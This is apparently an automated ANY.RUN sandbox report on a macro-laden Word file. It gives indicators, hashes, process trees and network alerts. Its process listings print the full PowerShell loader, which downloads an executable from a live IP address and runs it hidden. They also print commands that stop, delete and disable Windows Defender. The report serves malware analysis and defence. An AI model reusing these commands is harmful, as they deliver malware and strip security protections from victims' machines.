analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Transfer_44406.doc

Full analysis: https://app.any.run/tasks/85e05b3e-69a2-4e3f-8a80-af83e588b874
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 14, 2018, 14:44:44
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: user, Template: Normal, Last Saved By: work, Revision Number: 22, Name of Creating Application: Microsoft Office Word, Total Editing Time: 15:00, Create Time/Date: Tue Nov 13 13:11:00 2018, Last Saved Time/Date: Tue Nov 13 13:34:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

506A7AE3D53BC76AC276F5D39A27A9FB

SHA1:

50A7CC6AB3943C6792D21D0EB09EE71206EFFD9F

SHA256:

3DFE6297FA8F6144A5D8C0A9931D7E947A39D0A263DF4F585B003DB0DBE89EF9

SSDEEP:

3072:w57WssAb0KJ7vnVMIZRfw8z8N5Ygaw/ZX/PcSJqDmO6KQcsnzM:w1zsw7yIZJEYgaw/ZXM0kmtKQcsg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 996)
      • cmd.exe (PID: 3772)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 772)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 772)
    • Application was dropped or rewritten from another process

      • tmp189.exe (PID: 1476)
      • tmp189.exe (PID: 2328)
    • Downloads executable files from IP

      • powershell.exe (PID: 3400)
    • Stops/Deletes Windows Defender service

      • cmd.exe (PID: 3356)
      • cmd.exe (PID: 1148)
      • cmd.exe (PID: 2612)
      • cmd.exe (PID: 2304)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 3400)
    • Known privilege escalation attack

      • DllHost.exe (PID: 3548)
    • Loads the Task Scheduler COM API

      • tmp189.exe (PID: 2328)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 1576)
      • tmp189.exe (PID: 1476)
      • tmp189.exe (PID: 2328)
    • Creates files in the user directory

      • powershell.exe (PID: 1576)
      • powershell.exe (PID: 3400)
      • powershell.exe (PID: 4080)
      • tmp189.exe (PID: 1476)
      • powershell.exe (PID: 3768)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3400)
      • tmp189.exe (PID: 1476)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3744)
      • cmd.exe (PID: 1088)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 772)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 772)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: user
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: work
RevisionNumber: 22
Software: Microsoft Office Word
TotalEditTime: 15.0 minutes
CreateDate: 2018:11:13 13:11:00
ModifyDate: 2018:11:13 13:34:00
Pages: 1
Words: -
Characters: 1
Security: None
CodePage: Windows Cyrillic
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 1
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
HeadingPairs:
  • Название
  • 1
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: ???????? Microsoft Word 97-2003
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
60
Monitored processes
20
Malicious processes
8
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe no specs cmd.exe no specs powershell.exe tmp189.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs CMSTPLUA no specs tmp189.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs sc.exe no specs sc.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
772"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Transfer_44406.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3772cmd /c powershell "'powershell ""<#about script#>function noraze([string] $nstr){(new-object system.net.webclient).downloadfile($nstr,''%tmp%\tmp189.exe'');<#last info#>start-process ''%tmp%\tmp189.exe'';}try{noraze(''http://46.173.218.26/flyingarm.bar'')}catch{noraze(''http://46.173.218.43/flyingarm.bar'')}'"" | out-file -encoding ascii -filepath %tmp%\tmp218.bat; start-process '%tmp%\tmp218.bat' -windowstyle hidden"C:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1576powershell "'powershell ""<#about script#>function noraze([string] $nstr){(new-object system.net.webclient).downloadfile($nstr,''C:\Users\admin\AppData\Local\Temp\tmp189.exe'');<#last info#>start-process ''C:\Users\admin\AppData\Local\Temp\tmp189.exe'';}try{noraze(''http://46.173.218.26/flyingarm.bar'')}catch{noraze(''http://46.173.218.43/flyingarm.bar'')}'"" | out-file -encoding ascii -filepath C:\Users\admin\AppData\Local\Temp\tmp218.bat; start-process 'C:\Users\admin\AppData\Local\Temp\tmp218.bat' -windowstyle hidden"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
996cmd /c ""C:\Users\admin\AppData\Local\Temp\tmp218.bat" "C:\Windows\system32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3400powershell "<#about script#>function noraze([string] $nstr){(new-object system.net.webclient).downloadfile($nstr,'C:\Users\admin\AppData\Local\Temp\tmp189.exe');<#last info#>start-process 'C:\Users\admin\AppData\Local\Temp\tmp189.exe';}try{noraze('http://46.173.218.26/flyingarm.bar')}catch{noraze('http://46.173.218.43/flyingarm.bar')}C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1476"C:\Users\admin\AppData\Local\Temp\tmp189.exe" C:\Users\admin\AppData\Local\Temp\tmp189.exe
powershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
1148/c sc stop WinDefendC:\Windows\system32\cmd.exetmp189.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3356/c sc delete WinDefendC:\Windows\system32\cmd.exetmp189.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
5
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3744/c powershell Set-MpPreference -DisableRealtimeMonitoring $trueC:\Windows\system32\cmd.exetmp189.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3164sc stop WinDefendC:\Windows\system32\sc.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
A tool to aid in developing services for WindowsNT
Exit code:
5
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 936
Read events
2 366
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
8
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
772WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9064.tmp.cvr
MD5:
SHA256:
1576powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\93E1X4937HN9I06SPF2K.temp
MD5:
SHA256:
3400powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YF10V1A61G2UYRFO4A0F.temp
MD5:
SHA256:
4080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N4N1A1CB4F61SR0CMALR.temp
MD5:
SHA256:
3768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IUL749W6IC3HZ4HPE2AP.temp
MD5:
SHA256:
1476tmp189.exeC:\Users\admin\AppData\Roaming\socketvision\tmp199.exeexecutable
MD5:BF87DAC60BF2DE6B98088F8EB66B5148
SHA256:F5F7347A7D71A5F70A94C16935236614E09A2C0BC6B5EB76C01F073B52F7EA9D
1576powershell.exeC:\Users\admin\AppData\Local\Temp\tmp218.battext
MD5:2B0681F310672AC47F59813241EF7AB6
SHA256:33306CF4EE6E793641B7A16E979477DFCD59D5D0BA1CB7A24AEDE8CB886B3DB9
4080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5e018d.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
3768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5e3697.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
4080powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
0
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3400
powershell.exe
GET
200
46.173.218.26:80
http://46.173.218.26/flyingarm.bar
RU
executable
567 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3400
powershell.exe
46.173.218.26:80
Garant-Park-Internet Ltd
RU
suspicious

DNS requests

No data

Threats

PID
Process
Class
Message
3400
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3400
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3400
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
No debug info